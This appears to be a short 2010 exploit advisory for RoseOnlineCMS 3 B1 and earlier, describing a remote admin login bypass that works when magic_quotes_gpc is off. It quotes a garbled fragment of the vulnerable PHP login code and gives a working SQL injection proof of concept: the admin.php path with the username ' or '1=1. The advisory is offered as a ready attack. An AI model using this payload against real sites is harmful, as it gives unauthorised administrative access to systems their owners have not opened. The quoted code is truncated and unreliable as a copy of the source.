\#'#/ (-.-) --------------------oOO---(_)---OOo------------------- | RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit | | (works only with magic_quotes_gpc = off) | ------------------------------------------------------ [!] Discovered: cr4wl3r [!] Download: http://sourceforge.net/projects/rosecms/files/ [!] Date: 16.01.2010 [!] Remote: yes [!] Code :
Username:
Password:

Click here to go to the control panel.'); } else { echo "You are banned, or you are an user with no permission to enter."; } } ?> [!] PoC: [RoseOnlineCMS_path]/modules/admin.php username : ' or '1=1 password : cr4wl3r